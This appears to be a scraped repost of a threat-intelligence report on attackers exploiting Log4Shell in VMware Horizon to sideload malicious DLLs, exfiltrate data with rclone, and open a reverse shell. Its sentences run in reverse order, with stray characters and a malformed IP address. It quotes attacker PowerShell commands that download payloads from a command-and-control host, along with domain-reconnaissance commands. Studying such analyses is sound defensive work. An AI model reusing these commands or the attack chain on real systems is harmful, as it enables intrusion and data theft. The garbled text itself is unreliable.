![]() ![]() The file is actually the rclone.exe tool used to exfiltrate data to a specific Dropbox location. In one case, we found an interesting binary file named update.exe. ![]() The files mfeann.exe, Lockdown.DLL, and update.exe (accessed via the node.exe tool) were dropped on the identified internal machines. In this case, the tool is used to provide a reverse shell to threat actors on IP: 4532.108.54 on port 80.Īfter a successful connection with the command and control (C&C) IP, we saw outbound traffic to several internal machines via SMB and WMI. The tool is written in the GO language and can provide many capabilities to threat actors: remote shell execution, upload/downloading files, and more. Lateral movement to machines in the networkĪfter the initial infection with Cobalt Strike, we observed that the threat actor dropped node.exe, which is a stowaway proxy tool that is publicly available on Github. In another intrusion we analyzed, the threat actor downloaded another legitimate executable named VMwareXferlog.exe and used the same technique to sideload the malicious DLL glib-2.0.DLL. It is a legitimate executable, signed by a known security company, but we found that threat actors misused it to sideload a malicious DLL named LockDown.DLL. The file mfeann.exe is an executable responsible for event creation and logging. In the cases we analyzed, there were different files used to sideload malicious DLLs. Invoke-WebRequest -uri hxxp://4532.108.54:443/LockDown.DLL -OutFile C:\users\public\LockDown.DLL Invoke-WebRequest -uri hxxp://4532.108.54:443/mfeann.exe -OutFile C:\users\public\mfeann.exe Here are the commands:Ĭ:\windows\system32\nltest /domain_trustsĬ:\windows\system32\net user StantoDe /domain The threat actor uses PowerShell commands to discover the victim network, then downloads mfeann.exe, LockDown.DLL, and c0000012.log. It then spawns a PowerShell instance to execute commands. The attack starts with exploiting the Log4j vulnerability (called Log4Shell) in VMware Horizon. We spotted similar behavior to Sentinel Labs in terms of entry points and sideloading, but the investigation, discussed in this article, focuses on techniques of exfiltration and lateral movement. Their investigation showed that through this utility, VMware is susceptible to sideloading DLLs. This investigation is related to a recent report from security team Sentinel Labs, which describes a technique used by the LockBit ransomware-as-a-service (RaaS) that takes advantage of a command line utility in VMware. However, we also found that some of the victims were infected with ransomware days after the data exfiltration. After investigating the chain of events, we found that many of these attacks resulted in data being exfiltrated from the infected systems. Trend Micro Research recently analyzed several cases of a Log4Shell vulnerability being exploited in certain versions of the software VMware Horizon.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |